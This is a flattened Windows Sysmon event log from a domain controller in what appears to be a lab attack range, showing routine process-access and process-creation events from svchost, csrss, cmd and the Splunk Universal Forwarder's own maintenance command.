13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8EE6-6005-D200-00000000A301}47564704C:\Windows\system32\cmd.exe{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.938{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000004011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.921{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.921{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.933{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.890{59A5CD1D-8EE6-6005-D100-00000000A301}48724884C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 